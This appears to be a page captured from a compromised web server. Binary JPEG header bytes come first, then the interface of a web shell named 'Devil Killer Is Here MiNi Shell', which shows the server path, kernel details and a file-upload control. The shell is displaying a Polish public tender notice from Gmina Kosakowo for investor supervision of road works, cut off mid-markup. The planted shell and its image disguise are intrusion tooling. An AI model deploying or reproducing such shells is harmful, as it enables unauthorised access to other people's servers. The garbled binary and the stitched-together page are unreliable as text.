JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251211/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251211/0059411001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie nadzoru inwestorskiego nad robotami „Budowa ulic Złote Piaski i Aloesowej w Kosakowie oraz Leszczynowej, Liściastej i Ogrodowej w Mostach” – etap ul. Złote Piaski i ul. Ogrodowa w Mostach” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KOSAKOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000531708</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Żeromskiego 69</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kosakowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-198</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 6604344</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ZAMOWIENIA@KOSAKOWO.PL</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminakosakowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie nadzoru inwestorskiego nad robotami „Budowa ulic Złote Piaski i Aloesowej w Kosakowie oraz Leszczynowej, Liściastej i Ogrodowej w Mostach” – etap ul. Złote Piaski i ul. Ogrodowa w Mostach” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-992eea90-83f9-4934-800e-0d4365126105</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00594110</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-12-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00044461/19/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Usługa pełnienia nadzoru inwestorskiego w branży budowlano-konstrukcyjnej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1231893 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1231893</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z “ROZPORZĄDZENIEM PREZESA RADY MINISTRÓW z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej<br/>oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a) .zip<br/>b) .7Z<br/>3) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB.<br/>4) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>5) Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z<br/>podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>6) Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>7) Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania<br/>wybranej metody podpisania plików oferty.<br/>8) Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do<br/>zamawiającego”, nie za pośrednictwem adresu email.<br/>9) Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.<br/>10) Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i<br/>zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert/wniosków.<br/>11) Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>12) Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>13) Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>14) Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest GMINA KOSAKOWO, 81-198 KOSAKOWO, UL. ŻEROMSKIEGO 69;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: monika.sawa@cbi24.pl;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.63.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – branża drogowa wraz z koordynacją pracy inspektorów nadzoru inwestorskiego pozostałych branż,<br/>a)	Przedmiotem zamówienia w części 1 jest usługa pełnienia funkcji Inspektora Nadzoru Inwestorskiego, branży drogowej nad realizacją inwestycji pn.: „Budowie ulic Złote Piaski i Aloesowej w Kosakowie oraz Leszczynowej, Liściastej i Ogrodowej w Mostach” – etap obejmujący ul. Złote Piaski w Kosakowie i ul. Ogrodową w Mostach” wraz z usługami dodatkowymi, zgodnie z przepisami a w szczególności zgodnie<br/> z zakresem czynności jaki dla nadzoru inwestorskiego przewiduje ustawa Prawo <br/>budowane z dnia 7 lipca 1994 r., dokumentacją projektową oraz bieżącymi ustaleniami<br/> z Zamawiającym, <br/>b)	Realizacja nadzorowanego zadania inwestycyjnego obejmuje w szczególności wy-konanie robót budowlanych o poniższych charakterystycznych parametrach budo-wy:<br/>	Całkowita długość układu drogowego do budowy wynosi ~ 777 m, <br/>Projekt obejmuje budowę jezdni o nawierzchni bitumicznej. Inwestycja zakłada także budowę chodnika, zjazdów, najazdów, ścieżki rowerowej, fragmentu ciągu pieszo-rowerowego, wysp kanalizujących.<br/>Ul. Złote Piaski<br/>Nowo wybudowana droga na odcinku od drogi powiatowej do ulicy Aloesowej będzie drogą gminną klasy D o szerokości 5,0 m, zaś na odcinku pozostałym (od ul. Aloesowej do ul. Ogrodowej) będzie drogą klasy L o szerokości 6,0 m.<br/>W km 0+440 zaprojektowano zatokę autobusową po stronie południowej. Zatokę zaprojektowano o szerokości 3,0 m i długości 20,0 m. Na odcinku od km0+570 do km 0+700 zaprojektowano 15 miejsc postojowych dla samochodów osobowych (w tym 1 miejsce dla osób niepełnosprawnych). Jezdnię zaprojektowano jako bitumiczną o przekroju ulicznym. Wzdłuż ulicy Złote Piaski zaprojektowano chodniki i ścieżki rowerowe zgodnie z planem sytuacyjnym. Skrzyżowania z ulicami Szafranową, Tymiankową i Bazyliową zaprojektowano jako wyniesione. Nawierzchnię wyniesionych skrzyżowań zaprojektowano jako bitumiczną a najazdy z kostki betonowej. <br/>W ramach inwestycji zachodzi konieczność rozbudowy drogi powiatowej nr 100 oraz skrzyżowania drogi powiatowej nr 100 z drogą gminną ul. Złote Piaski.<br/>Szczegółowy zakres robót, obowiązki Wykonawcy określa opis przedmiotu zamó-wienia (załącznik nr 7 do SWZ), wzór umowy (załącznik nr 6 do SWZ).<br/> 6.	Usługa nadzoru inwestorskiego, w każdej z branż, obejmuje m.in.<br/>1)	Zapoznanie się z przekazaną przez Zamawiającego wszelką dokumentacją dotyczącą nadzorowanego zadania inwestycyjnego oraz niniejszego Przedmiotu zamówienia, w tym w szczególności dokumentacją projektową, dokumentacją przetargową na roboty budowlane (łącznie z pytaniami i odpowiedziami umieszczonymi w postępowaniu przetargowym), umową z Wykonawcą robót budowlanych, umową z Nadzorem Autorskim.<br/>2)	Udział w protokolarnym przekazaniu przez Zamawiającego dla Wykonawcy robót Placu Budowy, na zasadach i w sposób określony w umowie o roboty budowlane (zwanej dalej również Kontraktem);<br/>3)	Reprezentowanie Zamawiającego na budowie w zakresie zapewnienia codziennego nadzoru inwestorskiego; dostosowanie czasu pracy Inspektorów Nadzoru do czasu pracy Wykonawcy robót budowlanych i wymagań Zamawiającego;<br/>4)	Pełnienie nadzoru inwestorskiego w ramach zawartej Umowy;<br/>5)	Uczestnictwo w cotygodniowych naradach technicznych i co miesięcznych radach budowy z udziałem Inspektorów Nadzoru, Kierownika Budowy, przedstawicieli Podwykonawców robót oraz przedstawicieli Zamawiającego; <br/>6)	Sprawdzanie zgodności wykonywanych robót budowlanych z projektem i pozwoleniem na budowę, przepisami prawa i zasadami wiedzy technicznej; <br/>7)	Sprawdzanie i potwierdzanie jakości dostarczanych przez Wykonawcę robót: materiałów budowlanych, urządzeń, wyposażenia, i innych elementów robót wymaganych zapisami Kontraktu, w sposób i na zasadach w nim opisanych;<br/>8)	Sprawdzanie dokumentów, zezwoleń, deklaracji właściwości użytkowych, certyfikatów itd., w celu uniknięcia użycia materiałów niezgodnych z projektem, uszkodzonych lub niemających wymaganych certyfikatów;<br/>9)	Sprawdzanie i zaakceptowanie przedłożonych przez Wykonawcę robót (w formie pisemnej) harmonogramów rzeczowo-finansowych wraz z ich aktualizacjami;<br/>10)	Potwierdzanie i sprawdzanie stanu mobilizacji i zapewnienia sprzętu na Terenie Budowy jako odpowiedni lub nie dla wykonywanych robót budowlanych i jako zgodny lub nie z Kontraktem;<br/>11)	Nadzór nad obsługą geodezyjną Wykonawcy robót budowlanych;<br/>12)	Dokonywanie kontroli w czasie dostarczania materiałów i urządzeń, które będą niezbędne do realizacji robót,<br/>13)	Zapewnienie kontroli nad sposobem składowania i przechowywania materiałów;<br/>14)	Sprawdzanie jakości oraz zgodności materiałów budowlanych i instalacyjnych z Kontraktem, organizowanie dodatkowych testów jakości, jeśli będzie to konieczne, polegających na zleceniu dodatkowych testów jakości przez specjalistyczne instytuty, jeżeli jest to niezbędne, przy czym dodatkowe testy wykonywane będą na koszt Wykonawcy robót – w przypadku użycia przez Wykonawcę materiału niezgodnego z Kontraktem;<br/>15)	Sprawdzanie poprawności wykonania i odbieranie Robót ulegających zakryciu lub zanikających;<br/>16)	Uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych. Potwierdzanie faktycznie wykonanych robót budowlanych oraz usuniętych wad/usterek;<br/>17)	Wprowadzanie w trakcie realizacji robót (w porozumieniu z Nadzorem Autorskim), zaleceń Zamawiającego;<br/>18)	Bieżące dokonywanie z projektantami stosownych uzgodnień oraz egzekwowanie uzupełnień w ramach prowadzonego nadzoru autorskiego i uzgadnianie z nimi ewentualnych zmian, wprowadzonych przez Zamawiającego i /lub Wykonawcę robót;<br/>19)	Informowanie Zamawiającego o konieczności wykonania robót dodatkowych, uzupełniających i innych zgodnie z Kontraktem;<br/>20)	Przygotowywanie i przedkładanie Zamawiającemu kosztorysów dotyczących robót dodatkowych oraz uzupełniających i innych zgodnie z Kontraktem, a także opiniowanie ich zasadności oraz dokonywanie ich kontroli w trakcie realizacji;<br/>21)	Analizowanie i weryfikowanie zgodności z zapisami Kontraktu, dokumentów sporządzanych przez Wykonawcę robót i projektantów, na etapie realizacji Kontraktu, wraz z ich pisemną opinią;<br/>22)	Przygotowywanie i przedkładanie Zamawiającemu protokołów konieczności robót dodatkowych oraz uzupełniających i innych zgodnie z Kontraktem, wraz z kosztorysami dotyczącymi tych robót, a także opiniowanie ich zasadności, odpowiednio do nadzorowanego zakresu robót;<br/>23)	Wystawianie protokołów upoważniających Wykonawców robót do wystawiania faktur wraz z ustalaniem wartości wykonanych robót, na zasadach i w sposób określony w Kontrakcie;<br/>24)	Przeprowadzanie regularnych inspekcji Terenu Budowy sprawdzających w szczególności prawidłowość i jakość wykonywanych robót, przestrzeganie przepisów BiHP, jakość używanych materiałów, itp.;<br/>25)	Wydawanie Wykonawcy robót, Kierownikowi budowy lub Kierownikowi robót, poleceń dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych, potwierdzonych wpisem do Dziennika Budowy;<br/>26)	Żądanie od Wykonawcy, Kierownika budowy lub Kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót budowlanych, a także wstrzymania ich dalszego wykonywania w przypadku, gdy ich kontynuacja mogłaby wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę;<br/>27)	Nadzór nad właściwym wywiązywaniem się z Kontraktu przez Wykonawcę robót; <br/>28)	Monitorowanie zgodności postępu rzeczowego i finansowego robót budowlanych z zatwierdzonym harmonogramem rzeczowo-finansowym;<br/>29)	Niezwłoczne sprawdzanie zestawień ilości i wartości wykonanych robót, będących podstawą do rozliczeń finansowych Zamawiającego z Wykonawcą robót budowlanych, odpowiednio do zakresu nadzorowanych robót;<br/>30)	Przeprowadzanie przy udziale Zamawiającego odbiorów częściowych oraz odbioru końcowego w sposób i zgodnie z zapisami Kontraktu; <br/>31)	Nadzorowanie i dopilnowanie zaleceń komisji odbiorowej dotyczących usunięcia przez Wykonawcę robót stwierdzonych usterek dających się naprawić; <br/>32)	Opracowanie opinii dotyczącej wad obiektu uznanych za nie nadające się do usunięcia oraz wnioskowanie o obniżenie wynagrodzenia Wykonawcy robót z określeniem utraty wartości robót budowlanych i kwot obniżonego wynagrodzenia za te roboty;<br/>33)	Opiniowanie proponowanych metod wykonania robót budowlanych zaproponowanych przez Wykonawcę robót;<br/>34)	Uzgadnianie z Zamawiającym wszelkich propozycji zmian dotyczących zakresu, technologii i wartości robót budowlanych;<br/>35)	Sprawdzanie rozwiązań zamiennych i wnioskowanie do Zamawiającego o ich zastosowanie;<br/>36)	Zatwierdzanie rysunków wykonawczych i warsztatowych sporządzonych przez Wykonawcę robót budowlanych;<br/>37)	Informowanie Zamawiającego z odpowiednim wyprzedzeniem o wszelkich zagrożeniach występujących podczas realizacji robót oraz podejmowanych działaniach zapobiegawczych i naprawczych;<br/>38)	Sprawdzenie poprawności opracowania dokumentacji powykonawczej oraz ocena jej zgodności z faktycznie wykonanymi robotami budowlanymi, w sposób i na warunkach określonych w Kontrakcie;<br/>39)	Przygotowanie, w przypadku przerwania robót budowlanych przez Wykonawcę robót, inwentaryzacji wykonanych robót wykonanych do dnia ich przerwania;<br/>40)	W przypadku przerwania Kontraktu, wykonywanie wszelkich czynności związanych z tym przerwaniem, w tym co najmniej nadzór nad przejęciem placu budowy, nad robotami zabezpieczającymi itp.;<br/>41)	W przypadku rozliczenia obmiarowego z Wykonawcą Robót, zweryfikowanie i pisemne zatwierdzenie obmiarów robót wykonanych przez Wykonawcę robót. Pozostały zakres obowiązków zawarto w Rozdziale IV pkt 6 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71700000-5 - Usługi nadzoru i kontroli</p> <p 